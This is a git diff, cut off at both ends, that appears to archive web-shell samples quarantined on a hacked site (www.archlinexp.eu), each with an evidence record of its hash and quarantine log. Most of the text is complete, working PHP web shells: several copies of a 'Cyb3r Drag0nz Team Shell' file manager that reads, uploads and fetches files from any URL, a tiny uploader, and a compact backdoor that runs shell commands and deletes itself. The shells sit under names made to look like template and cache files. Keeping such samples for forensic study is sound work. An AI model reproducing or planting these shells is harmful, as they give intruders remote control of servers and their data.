'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json.evidence.json new file mode 100644 index 0000000..2e2f27e --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5106", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/templates/hathor/index.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346973, + "size": 10657, + "uid": 20043 + }, + "rel_path": "administrator/templates/hathor/index.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json b/var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json.evidence.json new file mode 100644 index 0000000..069db0e --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5108", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/templates/isis/index.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346970, + "size": 10657, + "uid": 20043 + }, + "rel_path": "administrator/templates/isis/index.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json b/var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json.evidence.json new file mode 100644 index 0000000..be79245 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5103", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346953, + "size": 10657, + "uid": 20043 + }, + "rel_path": "administrator/yhajxaav.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/bexkn.php.json b/var/www/hosting/archlinexp.eu/www/bexkn.php.json new file mode 100644 index 0000000..199d0d1 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/bexkn.php.json @@ -0,0 +1 @@ +


'.php_uname()."\n".'
{ Uploader by X-MrG3P5 }

';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Ok Uploaded';}else{echo 'Not uploaded!';}}?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/bexkn.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/bexkn.php.json.evidence.json new file mode 100644 index 0000000..746284b --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/bexkn.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4916", + "log_excerpt": "[quarantine] www.archlinexp.eu:bexkn.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/bexkn.php.json)", + "original_sha256": "a9422f224ffc70deb475a1ad4d399a4bfcb87a3a7051341bfd9a8326153416cb", + "original_stat": { + "gid": 30037, + "mtime": 1783740328, + "size": 448, + "uid": 20043 + }, + "rel_path": "bexkn.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json b/var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json new file mode 100644 index 0000000..711797a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json.evidence.json new file mode 100644 index 0000000..600561f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4838", + "log_excerpt": "[quarantine] www.archlinexp.eu:c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json)", + "original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d", + "original_stat": { + "gid": 30037, + "mtime": 1783194675, + "size": 762, + "uid": 20043 + }, + "rel_path": "c_03e0fd55.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json b/var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json new file mode 100644 index 0000000..3b8ccaa --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json.evidence.json new file mode 100644 index 0000000..57b9130 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4865", + "log_excerpt": "[quarantine] www.archlinexp.eu:c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json)", + "original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8", + "original_stat": { + "gid": 30037, + "mtime": 1783201883, + "size": 762, + "uid": 20043 + }, + "rel_path": "c_7f0b46f9.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json b/var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json new file mode 100644 index 0000000..711797a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json.evidence.json new file mode 100644 index 0000000..c288a14 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5015", + "log_excerpt": "[quarantine] www.archlinexp.eu:cache/c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json)", + "original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d", + "original_stat": { + "gid": 30037, + "mtime": 1783194683, + "size": 762, + "uid": 20043 + }, + "rel_path": "cache/c_03e0fd55.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json b/var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json new file mode 100644 index 0000000..3b8ccaa --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json.evidence.json new file mode 100644 index 0000000..8200c10 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5022", + "log_excerpt": "[quarantine] www.archlinexp.eu:cache/c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json)", + "original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8", + "original_stat": { + "gid": 30037, + "mtime": 1783201890, + "size": 762, + "uid": 20043 + }, + "rel_path": "cache/c_7f0b46f9.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . "
"); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..24b9519 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5023", + "log_excerpt": "[quarantine] www.archlinexp.eu:cache/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353219, + "size": 10657, + "uid": 20043 + }, + "rel_path": "cache/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json b/var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . "
"); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json.evidence.json new file mode 100644 index 0000000..18fc232 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5025", + "log_excerpt": "[quarantine] www.archlinexp.eu:cache/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346946, + "size": 10657, + "uid": 20043 + }, + "rel_path": "cache/yhajxaav.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/cbdjs.json b/var/www/hosting/archlinexp.eu/www/cbdjs.json new file mode 100644 index 0000000..d52d8d7 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/cbdjs.json @@ -0,0 +1,101 @@ + 10000000) 